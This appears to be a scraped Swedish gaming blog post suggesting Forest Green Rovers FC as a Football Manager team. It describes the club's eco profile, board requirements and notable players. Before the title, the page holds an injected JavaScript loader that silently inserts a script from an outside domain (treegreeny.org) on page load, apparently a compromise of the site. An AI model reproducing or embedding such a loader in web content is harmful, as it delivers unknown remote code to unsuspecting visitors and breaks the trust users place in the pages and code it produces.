;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); Veckans inspiration: Forest Green Rovers FC – FMSweden
Meny Stäng

Veckans inspiration: Forest Green Rovers FC

Denna vecka tänkte jag bjuda på ett lagtips om en klubb som varit aktuell under den senaste veckan, närmare bestämt Forest Green Rovers FC i League 2. Arsenal-försvararen Héctor Bellerín har nämligen blivit klubbens näst största delägare. “Världens grönaste klubb” är till exempel klassificerad som koldioxidneutral av FN, har solpaneler på en arena nästan helt gjord av trä och är dessutom helt vegansk.

Det finns även en lång historia att ta hänsyn till här, då klubben grundades redan 1889. Sportsligt har de dock inte rönt några vidare framgångar, utan femteplatsen i League 2 år 2018/19 är den bästa prestationen, då de förlorade i kvalet. Nu är de topptippade för att avancera i seriesystemet och samtidigt är kraven från styrelsen ganska många. Det handlar om att köpa unga spelare, spela anfalls- och possessionfotboll, få ut max av fasta situationer, utveckla egna talanger samt värva spelare i nedre delar av seriepyramiden. Kan du klara av allt detta och samtidigt prestera sportsligt? Det blir onekligen en rejäl utmaning.

Truppen då? Jodå, det finns kvalitet. Inte minst i form av den 22-årige offensive mittfältaren Aaron Collins som lär kunna säljas dyrt om några år. Gambiern Ebou Adams är det enda icke-brittiska inslaget i en bred trupp med bra åldersmix överlag. Truppreglerna är inga problem att följa eftersom nästintill samtliga spelare är egna produkter inom nationen, så det är inget du behöver bekymra dig om på transfermarknaden. Och sist men inte minst så har de fantastiskt fina matchställ och klubblogga. Bara det motiverar ju ett försök enligt mig. Lycka till!

Please wait...

Liknande Inlägg

Lämna ett svar